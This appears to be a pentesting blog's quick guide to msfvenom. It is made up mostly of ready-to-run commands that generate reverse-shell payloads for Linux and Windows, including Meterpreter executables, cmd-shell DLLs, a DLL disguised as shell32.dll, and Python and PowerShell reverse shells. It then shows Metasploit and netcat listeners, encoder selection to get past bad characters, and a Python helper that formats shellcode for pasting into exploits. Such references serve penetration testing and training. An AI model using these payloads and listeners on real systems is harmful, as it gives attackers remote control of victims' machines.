
MSF Venom Quick Guide

Posted in Pentesting


Generation Commands


Staged Meterpreter

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > shell-meterp.elf

Inline Meterpreter

msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > santas.elf


Executable with Meterpreter

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-meterp.exe

Executable with Windows cmd

msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-cmd.exe

Windows DLL with Windows cmd

msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f dll > shell-cmd.dll

Execute a Windows command - generate a DLL named shell32.dll that launches calc.exe when it is loaded

msfvenom -f dll -p windows/exec CMD="C:\windows\system32\calc.exe" -o shell32.dll



Python reverse shell (raw, for UNIX targets)

msfvenom -p cmd/unix/reverse_python LHOST=YourIP LPORT=YourPort -f raw

PowerShell reverse shell (raw)

msfvenom -p windows/powershell_reverse_tcp LHOST=YourIP LPORT=YourPort -f raw

Usage Tips

Payload Options

msfvenom -p [payload] --payload-options
msfvenom -p windows/meterpreter/reverse_tcp --payload-options

List encoders

root@kali:/# msfvenom -l encoders

Encoding your payload with x86/shikata_ga_nai is a good default, but when your shellcode has bad characters that must be avoided, shikata_ga_nai can fail with an error at generation time. Use this command to list the available encoders and pick one that fits your constraints.

Create Listener

In Metasploit, set a listener for the Windows Meterpreter payload. The handler's payload, LHOST and LPORT must match the values used when the payload was generated; this example uses the x64 variant, whereas the generation command above produced the 32-bit windows/meterpreter/reverse_tcp.

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST YourIP
set LPORT YourPort
run

In Metasploit, set a listener for the Linux Meterpreter payload

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST YourIP
set LPORT YourPort
run

Set Netcat Listener

nc -lvp YourPort


You can generate the shell output in two different kinds of format: Executable or Transform. Which one you choose depends on the scenario.

Executable - a standalone executable shell with an extension such as .elf, .exe, .py or .php. Eg: you have an unstable, non-interactive, low-privilege shell on a vulnerable Windows machine and want something more stable and efficient. You'd generate the payload as an .exe, create a listener, upload it and execute it.

Transform - raw shellcode that can be pasted into an existing exploit. The transform format depends on the language the exploit is written in. Eg: you need shellcode to paste into a code-execution exploit that is ultimately run by a vulnerable public-facing web app in JavaScript. To format the shellcode you may want to use: -f js_le (JavaScript, little-endian)

List of formats…

root@kali:/# msfvenom --help-formats 
Executable formats
	asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
	bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
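Added example (Python, not msfvenom's or Metasploit's own code) showing what the transform formats listed above actually do to a byte buffer, and the bad-character check that tells you whether the encoder step from "List encoders" is needed at all. The sample bytes are constructed for illustration and are not a working payload; the renderers imitate the output shapes of the c, py, hex, dword, js_le and js_be transforms (the byte used to pad a dword-aligned buffer is an assumption, and parse_c_escapes is a helper of this example only).

```python
"""Render a byte buffer into msfvenom-style transform formats and check it
against a bad-character list.

Added example, not part of the original guide and not Metasploit's code.
The renderers imitate the output shapes of msfvenom's c, python, hex,
dword, js_le and js_be transforms; SAMPLE is constructed and is not a
working payload.
"""
import re
import struct

# Constructed sample bytes: include a NUL and a line feed so the
# bad-character check below has something to report.
SAMPLE = bytes([0xFC, 0xE8, 0x00, 0x00, 0x0A, 0x41, 0x90, 0xCC, 0x31])


def find_bad_chars(shellcode: bytes, badchars: bytes) -> list:
    """Return (offset, byte) pairs for every byte that appears in badchars.
    A non-empty result means the raw buffer cannot be dropped into an
    exploit that stops at those bytes (e.g. a C string copy on \\x00),
    which is exactly when an encoder has to be chosen."""
    return [(i, b) for i, b in enumerate(shellcode) if b in badchars]


def to_c(shellcode: bytes, per_line: int = 8) -> str:
    """`-f c` shape: unsigned char buf[] = "\\xfc\\xe8..."; wrapped per line."""
    lines = []
    for i in range(0, len(shellcode), per_line):
        chunk = shellcode[i:i + per_line]
        lines.append('"' + "".join(f"\\x{b:02x}" for b in chunk) + '"')
    return "unsigned char buf[] = \n" + "\n".join(lines) + ";"


def to_python(shellcode: bytes, per_line: int = 8) -> str:
    """`-f py` shape: buf = b"" followed by buf += b"\\x.." lines."""
    out = ['buf =  b""']
    for i in range(0, len(shellcode), per_line):
        chunk = shellcode[i:i + per_line]
        out.append('buf += b"' + "".join(f"\\x{b:02x}" for b in chunk) + '"')
    return "\n".join(out)


def to_hex(shellcode: bytes) -> str:
    """`-f hex` shape: one continuous lowercase hex string."""
    return shellcode.hex()


def to_dword(shellcode: bytes) -> str:
    """`-f dword` shape: 32-bit little-endian words as 0x........ literals.
    The buffer is padded with 0x90 up to a multiple of 4 bytes (assumption:
    the exact padding used by msfvenom is not documented on the page)."""
    padded = shellcode + b"\x90" * (-len(shellcode) % 4)
    words = struct.unpack("<%dI" % (len(padded) // 4), padded)
    return ", ".join(f"0x{w:08x}" for w in words)


def to_js_unescape(shellcode: bytes, little_endian: bool = True) -> str:
    """`-f js_le` / `-f js_be` shape: %uXXXX escapes for JavaScript's
    unescape(), two bytes per escape. js_le writes each pair with the
    second byte first (bytes fc e8 become %ue8fc); js_be keeps byte order.
    An odd trailing byte is padded with 0x41, as Rex::Text.to_unescape does."""
    data = shellcode + (b"\x41" if len(shellcode) % 2 else b"")
    out = []
    for i in range(0, len(data), 2):
        b1, b2 = data[i], data[i + 1]
        out.append(f"%u{b2:02x}{b1:02x}" if little_endian else f"%u{b1:02x}{b2:02x}")
    return "".join(out)


def parse_c_escapes(text: str) -> bytes:
    """Helper of this example: recover the bytes from a `-f c` or `-f py`
    style dump so a pasted buffer can be re-checked or re-rendered."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


if __name__ == "__main__":
    print("bad chars at:", find_bad_chars(SAMPLE, b"\x00\x0a\x0d"))
    print(to_c(SAMPLE))
    print(to_js_unescape(SAMPLE))          # js_le
    print(to_js_unescape(SAMPLE, False))   # js_be
    print(to_dword(SAMPLE))
```

Run find_bad_chars first with the byte set your target exploit cannot carry; only if it returns offsets do you need to go back to msfvenom with an encoder. The js_le and js_be renderers make the endianness difference concrete: the same bytes produce different %u escapes, and pasting the wrong one into a JavaScript exploit silently swaps every byte pair.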
